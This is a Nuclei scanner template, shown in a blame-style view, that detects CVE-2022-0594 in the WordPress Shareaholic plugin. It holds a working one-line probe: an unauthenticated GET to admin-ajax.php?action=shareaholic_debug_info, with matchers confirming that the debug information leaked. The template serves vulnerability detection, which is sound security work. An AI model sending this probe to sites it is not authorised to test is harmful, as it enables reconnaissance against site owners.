nuclei-templates/http/cves/2022/CVE-2022-0594.yaml

56 lines
2.1 KiB
YAML
Raw Normal View History

id: CVE-2022-0594
2022-08-22 07:17:05 +00:00
info:
name: WordPress Shareaholic <9.7.6 - Information Disclosure
author: atomiczsec
severity: medium
description: WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.).
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the target system.
2023-09-06 11:59:08 +00:00
remediation: |
Update the Shareaholic plugin to version 9.7.6 or later to fix the information disclosure vulnerability.
reference:
- https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1
- https://wordpress.org/plugins/shareaholic/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594
- https://nvd.nist.gov/vuln/detail/CVE-2022-0594
- https://github.com/20142995/sectool
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-0594
cwe-id: CWE-863
epss-score: 0.00188
epss-percentile: 0.55305
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:*
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: shareaholic
product: shareaholic
2023-09-06 11:59:08 +00:00
framework: wordpress
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan,shareaholic
2023-07-11 19:49:27 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'plugin_version'
- 'shareaholic_server_reachable'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022026e65f1c90c6eaf9ba5e9c3b8e4f427ce9aa3f172726d7f11a359aef9ff18913022100ea92da8d8af3bd508e47e670034d7298492987012965f9bfbc5b403cf1fd12da:922c64590222798bb761d5b6d8e72950